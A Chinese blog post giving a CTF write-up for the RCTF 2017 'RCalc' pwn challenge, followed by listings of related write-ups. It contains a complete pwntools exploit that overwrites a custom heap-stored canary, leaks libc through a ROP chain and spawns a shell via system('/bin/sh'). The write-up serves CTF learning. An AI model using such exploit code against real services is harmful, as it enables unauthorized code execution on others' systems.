RCalc RCTF-2017

最新推荐文章于 2022-03-09 20:30:00 发布
最新推荐文章于 2022-03-09 20:30:00 发布
阅读量282 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/97898807
版权

这个题目比较好玩的一点就是自己写了一个canary的保护

其实就是首先开了堆

然后随机值 然后 把随机值保存到堆里面 后来在取出来做对比

用一个canary 然后保存一个 类似栈结构  ++  ---

然后 根据 堆的知识以及调试可以知道

我们保存的结果可以溢出到堆里面 那么 我们直接修改就可以了  然后泄露一下就ok了

from pwn import *
context.log_level = 'debug'

#p = remote('127.0.0.1', 2333)
debug=0
if debug:
	io=process("./RCalc")
else:
	io=remote("111.198.29.45",36210)
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
puts_plt = 0x400850
__libc_start_main_ = 0x601FF0

rdi_ret = 0x0000000000401123
main_addr = 0x0000000000401036

payload=""
def pass_canary(k):
	for i in range(35+k):
		io.recvuntil("Your choice:")
		io.sendline("1")
		io.recvuntil("input 2 integer: ")
		io.send("0\n0\n")
		io.recvuntil("Save the result? ")
		io.sendline("yes")
		#sleep(0.2)
	io.recvuntil("Your choice:")
	io.sendline("5")

if __name__ =="__main__":
	payload+="\x00"*0x110
	payload+=p64(0)
	payload+=p64(rdi_ret)
	payload+=p64(__libc_start_main_)
	payload+=p64(puts_plt)
	payload+=p64(main_addr)

	io.recvuntil("Input your name pls: ")
	io.sendline(payload)

	pass_canary(0)

	libc_start_main_addr = u64(io.recvn(6).ljust(8, '\x00'))

	libc_addr_base=libc_start_main_addr-libc.sym['__libc_start_main']

	log.success("libc_start_main_addr "+hex(libc_start_main_addr))
	log.success("libc_addr_base "+hex(libc_addr_base))

	system_addr=libc_addr_base+libc.sym['system']
	bin_sh_addr=libc_addr_base+libc.search("/bin/sh").next()

	payload="\x00"*0x110
	payload+=p64(0)
	payload+=p64(rdi_ret)
	payload+=p64(bin_sh_addr)
	payload+=p64(system_addr)
	payload+=p64(main_addr)

	io.recvuntil("Input your name pls: ")
	io.sendline(payload)

	pass_canary(0)

	io.interactive()

拿到flag

pipixia233333
关注
专栏目录
攻防世界pwn RCalc
PLpa的博客
02-22 490
需要知识:ROP,堆溢出 发现查询没开PIE和canary。 程序在最开始申请了几个堆空间,并不允许我们自己申请,而且整个程序并没有free的地方,所以常规的堆漏洞并不容易利用,这时候我们就继续往下看。 这里可以看到,主要功能函数处有一个没有输入限制的字符串,由此我们就联想到使用常规的ROP。 但是程序在主要功能函数中添加了随机数植入,构造了一个自定义的canary,我们只要覆盖了这个随机...
Rcalc(xctf)
weixin_43868725的博客
08-30 384
0x0 程序保护和流程 保护: 流程: main() init_heap() qword_6020F8存放着第一个申请的chunk,qword_6020F0存放着第二个申请的chunk,*(qword_6020F8+8)存放着第三个申请的chunk,*(qword_6020F0+8)存放着第四个申请的chunk real_main() 程序没有开启canary保护,但是通过create_random()和get_random()实现了canary的功能。在输入name的时候没有限制长度,存在栈溢出。
[XCTF-pwn] 30_xctf-3rd-RCTF-2017_rcalc
weixin_52640415的博客
03-09 241
程序本身有溢出,未开pie,got表可写。但是calc有密码校验。 数据结构: 两个0x20块存计数器和指针 0x110块存输入数据 0x330块存使用的密码每次向后加一个提前放入 漏洞: 指针下边界无限制可溢出写,每次会写入输入的数据,通过输入超过33个数覆盖密码区。 思路: 先溢出写入rop 向前移动输入块,清密码1(返回时候用) 选择退出,这时与当前密码指针重叠,可以绕过检查 退出后执行rop得到libc并重入 同1-4写入system(/bin/sh) 完整ex...
RCTF-RCalc WP
qq_41252520的博客
07-28 638
保护 分析 IDA分析代码,部分函数名经过我的分析已被重置 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比 ...
攻防世界PWN之RCalc题解
seaaseesa的博客
11-19 1437
RCalc 首先,检查一下程序的保护机制,还不错,只开了NX 然后,我们用IDA分析 看到这,感觉像是堆的题,应该会很复杂。然而,我们再看看其他地方,发现这个函数只是在初始化时调用的,也不太可能会被利用,而且程序全程没有调用free函数 然后,我们瞧瞧其他函数,看到这里感觉好复杂,然而,它只是一个用来生成随机数的函数罢了 然后,我们继续看其他函数 这个样子,好像是can...
攻防世界PWN之Recho题解
seaaseesa的博客
11-09 2553
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
rcalc:用锈写的波兰符号计算器
06-17
rcalc 是一个可编程的波兰符号计算器。 这意味着运算符写在术语之前。 例如, (+ 2 2)等于 4, (+ 2 3 (/ 10 2))等于 10。这类表达式的正则记号称为中缀,它们分别写成2 + 2和2 + 3 + 10 / 2. 这是用每晚版本的 ...
Blender_UDK_FBX-Exporter:修改后的Blender的FBX导出器,并带有一些与UDKUE4一起使用的附加功能
05-07
支持Blender的分割法线,由adsn的Rcalc顶点法线插件和我的旧FBX法线工具创建的法线 导出Blender的切线(Mikk TSpace)以用于自定义法线 自定义导出UI面板 使用根骨头作为根而不是创建自己的根骨头包括对电枢旋转的...
warmup
热门推荐
qq_41071646的博客
01-10 1万+
这个  其实 算是 入门题  在上面可以看到 打印出来了很多东西   然后  发现他会 把我们这个地址打印出来 那么我们只要把返回地址 补充上就好了   这里耗费了 我不少功夫 然后我们输入 动态调试一下  看看哪里  是返回值  发现 插了 8*9  72个字符 那么 就很好办了 构造就完事了 # -*- coding:utf-8 -*- from pwn impo...
攻防世界: cgpwn2
qq_41071646的博客
01-02 4342
这个题 也是新手入手的题 比较简单   怎么说呢 就是一个简单的构造罢了 点进hello  然后发现  然后我们点进name   发现 name 地址是固定的 我们可以将这个写入 bin/sh 就可以了 然后看 system列表    这里可以看的出来  是有42个 字符  就可以 返回我们gets 的返回地址  然后  我们 只需要 讲system 搞进去 然后输入...
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3457
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 2998
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
strlen 返回值的漏洞
qq_41071646的博客
12-31 2927
strlen 是一个统计字符串长度的函数  然后我们这次说的题 就是 关于strlen 返回值 造成 溢出的问题 在32的系统中 有这么一种情况   strlen 的结果的返回值给8位寄存器al  那么8位最多是多少? 255  如果我们 多输入会怎么办 我们如果输入257  二进制是多少呢 ‭000100000001‬  这个应该是没有什么好说的  那么假如我们输入了 257个字符 那么最后...
pwn -----gets 漏洞的利用
qq_41071646的博客
12-29 2146
其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题  这个题 还是很简单的    先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag   在 调试下 发现了   然后...
强网杯 签到re 签到pwn 题解
qq_41071646的博客
05-27 2087
强网杯给打自闭了 最后也是没有进到第一页 比较可惜 不过手速快 抢到了 先锋的三血 感觉还不错 不得不说强网的反作弊做的真心不错 re 都能每个人的flag 不一样 真心可以 然后强网的 pwn题竟然还有用队伍 token来搞 真的秀 先说re 即可得出flag Just re 这个题目也算是签到题 首先要修复函数 虽然 上面xmmword_405018 变化...
BUUCTF PWN题刷题记录 (未完待续)
qq_41071646的博客
08-01 2042
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一题 连上就有flag的pwn 直接 运行就有权限,。 第二题 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
2019UNCTF-竞技赛 部分WP
qq_41071646的博客
10-30 1968
web RE PWN Crypto misc 新手 求带 RE fackre 这个当时 没有做出来 去看牙了,,,,, 最后复现出来了。,。 直接看脚本 fromCrypto.Util.numberimport* #importgmpy2 importbinascii importhashlib lists=[0x1b,0x5d,0x42,0x2...
CTF PWN setbuf 的利用
qq_41071646的博客
08-09 1897
要说 setbuf 之前 要好好说一下 stdin stdout stderr 是stdio库中的文件流 其实 看名字都能看出来这是干啥的 stdin 是 标准输入 在文件标识符是 0 stdout 是 标准输出 在文件标识符是 1 stderr 是标准错误输出 在文件标识符是 2 其实 可以简单的理解成 stdin 是输入流 等待着键盘输入 stdout...
XCTF 4th-QCTF-2018 babyheap
qq_41071646的博客
07-28 1863
这几天做pwn题做的很恶心了,,等下个星期想去继续肝内核pwn。。 先看一下这个题目的保护 基本该有的保护都有了 然后先看一下这个题 ida里面分析 发现了 程序没有给我们堆块修改的功能 这里可以通过 堆块合并 /重叠 然后申请达到修改堆块还有泄露堆块的目的 这里我们发现了 off by null 然后这里的思路 exp 来源于 https://www.xct...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值